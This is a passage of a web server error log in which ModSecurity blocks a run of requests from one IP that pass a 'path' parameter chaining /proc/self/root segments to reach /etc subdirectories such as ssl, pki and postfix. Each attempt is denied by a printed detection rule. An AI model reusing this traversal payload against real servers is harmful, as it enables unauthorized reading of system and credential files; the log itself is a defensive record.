"abqPbSmAPhZkrhU8w4lX5QAAAIc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 08:41:34.483291 2026] [:error] [pid 26799:tid 140411725141760] [client 74.7.243.128:42314] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqPbta6ubjKNq_cu4aCwgAAA0I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 08:41:35.859022 2026] [:error] [pid 30077:tid 140411733534464] [client 74.7.243.128:42330] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqPb_u8EFLIOrSqIpvvmQAAAkE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 08:41:41.740559 2026] [:error] [pid 17653:tid 140411607643904] [client 74.7.243.128:42336] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqPdcdf6f5d65gmYZS-fgAAAtA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 08:41:43.099040 2026] [:error] [pid 15051:tid 140411716749056] [client 74.7.243.128:60436] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqPdymAPhZkrhU8w4lX6gAAAIM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 08:41:45.530976 2026] [:error] [pid 17653:tid 140411624429312] [client 74.7.243.128:60448] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqPecdf6f5d65gmYZS-hgAAAs4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 08:41:47.564638 2026] [:error] [pid 17887:tid 140411691570944] [client 74.7.243.128:60458] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqPewkwaGbbGflqUZD7dQAAAMY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 08:41:50.332830 2026] [:error] [pid 17653:tid 140411699963648] [client 74.7.243.128:60466] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqPfsdf6f5d65gmYZS-iQAAAsU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 08:41:53.271077 2026] [:error] [pid 31803:tid 140411632822016] [client 74.7.243.128:43532] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqPgOyqAr6etmhZHNqofgAAAE0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 08:41:55.082911 2026] [:error] [pid 31803:tid 140411666392832] [client 74.7.243.128:43536] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqPg-yqAr6etmhZHNqoggAAAEk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 08:41:56.424413 2026] [:error] [pid 31803:tid 140411607643904] [client 74.7.243.128:43538] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqPhOyqAr6etmhZHNqohgAAAFA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 08:41:57.922048 2026] [:error] [pid 17653:tid 140411741927168] [client 74.7.243.128:43554] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqPhcdf6f5d65gmYZS-jQAAAsA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 08:42:01.310361 2026] [:error] [pid 19507:tid 140411741927168] [client 74.7.243.128:43558] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqPh9Y0UrI5A3LftIyLaAAAAYA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 08:42:04.409269 2026] [:error] [pid 17653:tid 140411649607424] [client 74.7.243.128:54910] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqPjMdf6f5d65gmYZS-kwAAAss"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 08:42:04.866332 2026] [mime_magic:error] [pid 19507:tid 140411632822016] (70014)End of file found: [client 57.141.18.73:39300] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 08:42:07.230256 2026] [:error] [pid 11816:tid 140411649607424] [client 74.7.243.128:54916] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqPjuw_le52K8_3pV3LAAAAAgs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 08:42:07.776151 2026] [mime_magic:error] [pid 17653:tid 140411708356352] (70014)End of file found: [client 57.141.18.4:39566] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 08:42:09.416765 2026] [:error] [pid 17887:tid 140411616036608] [client 74.7.243.128:54926] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqPkAkwaGbbGflqUZD7gAAAAM8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 08:42:11.132473 2026] [:error] [pid 31803:tid 140411616036608] [client 74.7.243.128:49392] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqPk-yqAr6etmhZHNqolwAAAE8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 08:42:12.751994 2026] [:error] [pid 19507:tid 140411658000128] [client 74.7.243.128:49408] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqPlNY0UrI5A3LftIyLcwAAAYo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 08:42:14.654943 2026] [:error] [pid 26799:tid 140411733534464] [client 74.7.243.128:49416] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqPlta6ubjKNq_cu4aC2wAAA0E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 08:42:16.022548 2026] [:error] [pid 29882:tid 140411590858496] [client 74.7.243.128:49418] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqPmEzinOy1jxa1j4f-ZgAAARI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 08:42:17.328746 2026] [:error] [pid 15826:tid 140411548894976] [client 74.7.243.128:49432] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqPmeoXxyEfFpUF8f9ZUgAAAVc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 08:42:18.632883 2026] [:error] [pid 29882:tid 140411616036608] [client 74.7.243.128:49440] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqPmkzinOy1jxa1j4f-awAAAQ8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
